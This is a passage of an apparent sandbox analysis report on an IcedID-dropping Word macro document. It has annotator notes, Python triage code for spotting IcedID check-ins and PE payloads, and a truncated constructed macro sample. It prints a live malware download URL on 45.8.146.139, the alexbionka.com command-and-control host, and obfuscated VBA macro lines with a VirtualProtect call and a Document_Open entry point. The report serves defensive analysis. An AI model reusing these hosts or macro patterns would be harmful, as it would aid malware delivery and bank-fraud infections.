00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Note: the body is a 64-bit PE image despite the generic application/octet-stream label: e_lfanew 0xd0, Machine 0x8664, three sections (.text, .rdata, .rsrc), Characteristics 0x2022 (executable, large-address-aware, DLL), optional-header magic 0x20b, TimeDateStamp 0x62f4d159 = 2022-08-11 09:52:25 UTC, about six hours before the Date header of this response. The Content-Disposition filename is the same one that appears in the Content.IE5 cache file listed under dropped files below.
    Source: global traffic | HTTP traffic detected (request; the User-Agent is the default WinINet/URLMon string on this Windows 7 image, i.e. a non-browser process using the IE networking stack; the report finds this URL in r9093.tmp.exe and rundll32.exe memory):
        GET /fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll HTTP/1.1
        Accept: */*
        UA-CPU: AMD64
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 45.8.146.139
        Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected (response to the request above):
        HTTP/1.1 404 Not Found
        Server: nginx
        Date: Thu, 11 Aug 2022 15:38:37 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
        Data Raw: 31 30 63 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 6c 65 78 62 69 6f 6e 6b 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
        Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at alexbionka.com Port 80</address></body></html>0
    Note: the Server header says nginx, but the error page was generated by "Apache Server at alexbionka.com Port 80", so 45.8.146.139 appears to front the same Apache host that served the check-in above; that ties the two pieces of infrastructure together even though one is contacted by name and the other by hard-coded IP. The requested filename (...n5_crypt_x64_asm_clone_n13.dll) also differs from the one alexbionka.com served (...n3_crypt_x64_asm_clone_n14.dll), and it did not exist at capture time.
    Source: unknown | TCP traffic detected without corresponding DNS query: 45.8.146.139 (50 identical hits in the original report)
    Source: rundll32.exe, 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146
    Source: r9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_c
    Source: rundll32.exe, 00000005.00000002.944141742.0000000000594000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n
    Source: r9093.tmp.exe, 00000004.00000002.944568894.0000000000644000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.8.146.139/fhfty/A2-7QTSJAH4Zf
    Source: rundll32.exe, 00000005.00000002.944123295.0000000000394000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://alexbionka.com/
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7180F76F-1528-4360-9534-25B0235971A3}.tmp
    Source: unknown | DNS traffic detected: queries for: alexbionka.com
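    Two things in the exchanges above are worth automating: recognising the cookie-bearing GET / as an IcedID loader check-in (no User-Agent, the six Google-Analytics-lookalike cookie names, a hex-encoded _u field) and confirming that the application/octet-stream attachment really is a PE and what kind. The Python below is an added example, not part of the report or of any IcedID tooling. The request is reconstructed from the report's headers, the response body is the first 0xF0 bytes transcribed from the Data Raw dump, and the reading of the cookie names as a victim fingerprint follows public IcedID write-ups rather than anything stated on this page.

```python
"""Triage helpers for an IcedID-style check-in and the DLL it returns.
Added example, not sandbox code. SAMPLE_REQUEST is reconstructed from the
report's GET / line; PE_PREFIX is bytes 0x00-0xEF of the report's Data Raw
dump (MZ header, DOS stub, Rich header, "PE\0\0" and the COFF header)."""
import re
import struct
from datetime import datetime, timezone

# Cookie names public IcedID loader analyses describe as the victim
# fingerprint; the report itself does not name the fields (assumption).
ICEDID_COOKIE_NAMES = {"__gads", "_gat", "_ga", "_u", "__io", "_gid"}

SAMPLE_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: __gads=3570055661:1:6727:57; _gat=6.1.7601.64; _ga=1.329303.0.5; "
    "_u=323834393932:416C627573:31463945303738373942323239343237; __io=0; _gid=67AFEDC5AC03\r\n"
    "Host: alexbionka.com\r\n\r\n"
)

_DOS_HEADER = ("4d5a90000300000004000000ffff0000b8000000000000004000000000000000"
               + "00" * 28 + "d0000000")           # e_lfanew = 0xD0 at offset 0x3C
_DOS_STUB = (bytes.fromhex("0e1fba0e00b409cd21b8014ccd21")
             + b"This program cannot be run in DOS mode.\r\r\n$" + b"\0" * 7)
_RICH = ("55ef34c3118e5a90118e5a90118e5a9002e95991108e5a9059e05a91108e5a90"
         "33e6a590108e5a906ae15891108e5a9052696368118e5a90" + "00" * 24)
_COFF = "5045000064860300" + "59d1f462" + "00000000" + "00000000f00022200b020a0e00780500"
PE_PREFIX = bytes.fromhex(_DOS_HEADER) + _DOS_STUB + bytes.fromhex(_RICH + _COFF)

SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34\r\n"
    b'Content-Disposition: attachment; filename="loader_p3_dll_64_n3_crypt_x64_asm_clone_n14.dll"\r\n'
    b"Content-Length: 360448\r\n"
    b"Content-Type: application/octet-stream\r\n\r\n"
) + PE_PREFIX


def parse_cookies(request_text):
    m = re.search(r"^Cookie:[ \t]*(.+?)\r?$", request_text, re.M)
    if not m:
        return {}
    return dict(p.strip().split("=", 1) for p in m.group(1).split(";") if "=" in p)


def decode_u_cookie(value):
    """_u is colon-separated hex; parts that are not hex/ASCII become None."""
    fields = []
    for part in value.split(":"):
        try:
            fields.append(bytes.fromhex(part).decode("ascii"))
        except ValueError:            # UnicodeDecodeError is a ValueError too
            fields.append(None)
    return fields


def classify_request(request_text):
    cookies = parse_cookies(request_text)
    request_line = request_text.split("\r\n", 1)[0]
    checkin = (request_line.startswith("GET / ")
               and set(cookies) & ICEDID_COOKIE_NAMES == ICEDID_COOKIE_NAMES)
    return {
        "icedid_checkin": checkin,
        "no_user_agent": re.search(r"^User-Agent:", request_text, re.M) is None,
        "u_fields": decode_u_cookie(cookies["_u"]) if checkin else [],
    }


def parse_pe_summary(data):
    """Read the COFF header of a PE prefix; None if it is not a PE. Only header
    fields are touched, so a body truncated after e_lfanew+26 still parses."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 26 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, timestamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    characteristics, magic = struct.unpack_from("<HH", data, e_lfanew + 22)
    return {
        "machine": machine, "x64": machine == 0x8664, "sections": nsections,
        "is_dll": bool(characteristics & 0x2000), "pe32plus": magic == 0x20B,
        "compiled_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
    }


def classify_response(raw):
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = head.decode("latin-1")
    disp = re.search(r'^Content-Disposition:\s*attachment;\s*filename="([^"]+)"', headers, re.M | re.I)
    length = re.search(r"^Content-Length:\s*(\d+)", headers, re.M | re.I)
    return {
        "attachment": disp.group(1) if disp else None,
        "declared_length": int(length.group(1)) if length else None,
        "pe": parse_pe_summary(body),
    }


if __name__ == "__main__":
    print(classify_request(SAMPLE_REQUEST))
    print(classify_response(SAMPLE_RESPONSE))
```

    The check-in test requires all six cookie names on a GET / because any one of them is a legitimate Google Analytics cookie on ordinary web traffic; the PE check reads the header through e_lfanew rather than grepping for "MZ", so an HTML page that happens to start with those letters is not misreported, and the timestamp it recovers (2022-08-11 09:52:25 UTC) is the same value the note on the 200 response above was derived from.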

    E-Banking Fraud

    Source: Yara match | File source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE
    Source: Yara match | File source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR
    Source: Yara match | File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

    System Summary

    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPE | Matched rules: Windows_Trojan_IcedID_11d24d35, Windows_Trojan_IcedID_91562d18, Windows_Trojan_IcedID_48029e37 (Author: unknown)
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE | Matched rules: Detects IceID / Bokbot variants (Author: ditekSHen); Windows_Trojan_IcedID_11d24d35, Windows_Trojan_IcedID_0b62e783, Windows_Trojan_IcedID_91562d18, Windows_Trojan_IcedID_48029e37 (Author: unknown)
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPE | Matched rules: Detects IceID / Bokbot variants (Author: ditekSHen); Windows_Trojan_IcedID_11d24d35, Windows_Trojan_IcedID_0b62e783, Windows_Trojan_IcedID_91562d18, Windows_Trojan_IcedID_48029e37 (Author: unknown)
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_IcedID_0b62e783, Windows_Trojan_IcedID_91562d18, Windows_Trojan_IcedID_48029e37 (Author: unknown)
    Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_IcedID_11d24d35 (Author: unknown)
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_IcedID_11d24d35, Windows_Trojan_IcedID_0b62e783, Windows_Trojan_IcedID_91562d18, Windows_Trojan_IcedID_48029e37 (Author: unknown)
    Source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTR | Matched rule: Windows_Trojan_IcedID_11d24d35 (Author: unknown)
    Note: the report lists the Windows_Trojan_IcedID_<id> rules with Author: unknown; that naming scheme is the one Elastic Security uses for its public protections-artifacts Yara set. Four independent rule families (Elastic, ditekSHen, Telekom Security below, plus the configuration extractor) agree on IcedID, which is why the verdict rests on the unpacked rundll32.exe image rather than on the document itself.
    Source: Screenshot number: 12 | Screenshot OCR (lure text, remaining OCR output unreadable): ... "Enable editing" button on the top bar, and then click "Enable content".
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Dropped file: MD5: 51138beea3e2c21ec44d0932c71762a8 | Family: APT29 | Alias: Cozy Bear, Cozy Duke, The Dukes, Dukes, Group 100, CozyDuke, EuroAPT, CozyBear, CozyCar, Cozer, Office Monkeys, OfficeMonkeys, Minidionis, SeaDuke, Hammer Toss, APT29 | Description: APT29 has operated since at least 2008 and is attributed to the Russian government in public reports. It is regarded as a well-resourced, highly dedicated and organized cyber-espionage group that collects intelligence in support of foreign and security policy decision-making. | References:
        https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
        https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
        https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
        https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/
        https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
        https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf
        https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
      Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
    Note: this is an MD5 lookup against a third-party APT hash list, not a behavioural detection, and the report does not say which of the files WINWORD.EXE wrote carries this hash. Every other signature here (Yara, configuration extractor, C2 traffic) identifies IcedID, so treat the APT29 label as unverified unless the matching file is identified and its content corroborates it.
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\r9093.tmp.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\y875E.tmp.dllJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n14[1].dllJump to dropped file
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, )
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("wmubexAZc"), VbGet, )
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((lOePrNSeOnF7("o93TBY150D")), lOePrNSeOnF7("gEzmn7rG"), VbGet, lOePrNSeOnF7("mVwBL4NuTS"))
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("SwjpO4CYqFz"), VbGet, )
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Set = CallByName((), lOePrNSeOnF7("wmubexAZc"), VbGet, )
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_IceID author = ditekSHen, description = Detects IceID / Bokbot variants
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 5.2.rundll32.exe.2fab68.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000005.00000002.944227549.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: 00000005.00000002.944232122.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
    Source: 00000005.00000002.944007545.00000000002EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
    Source: Process Memory Space: rundll32.exe PID: 2480, type: MEMORYSTRMatched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
    Source: C:\Windows\System32\rundll32.exeCode function: 5_2_00000001800024FC5_2_00000001800024FC
    Source: courtesyautomotivedoc08.11.docOLE, VBA macro line: Private Sub Document_Open()
    Source: ~DF612CB1A14F491B4E.TMP.1.drOLE, VBA macro line: Private Sub Document_Open()
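The macro lines above (a kernel32!VirtualProtect declaration, a CallByName chain whose member names come from the lOePrNSeOnF7 string decoder, and a Document_Open auto-execute entry point) are the shape a macro-triage script should key on. What follows is an added example written for this page, not code from the report or from Joe Sandbox: a Python scorer run over a constructed macro modelled on those lines. The report prints the lines with their function and variable names stripped, so fn1, o1, o2 and o3 in the sample are placeholders; the weights, tag names and the MEMORY_APIS list are the example's own choices.

```python
import re
from collections import Counter

# Constructed sample modelled on the VBA lines quoted in this report. Joe Sandbox
# prints the lines with the function and variable names stripped, so fn1, o1, o2
# and o3 are placeholders; the decoder name lOePrNSeOnF7, its string arguments,
# the kernel32!VirtualProtect declaration and Document_Open are as printed.
SAMPLE_MACRO = r'''
Private Declare PtrSafe Function fn1 Lib "kernel32" Alias "VirtualProtect" (ByVal a As LongPtr, ByVal b As LongPtr, ByVal c As LongPtr, d As LongPtr) As LongPtr

Private Sub Document_Open()
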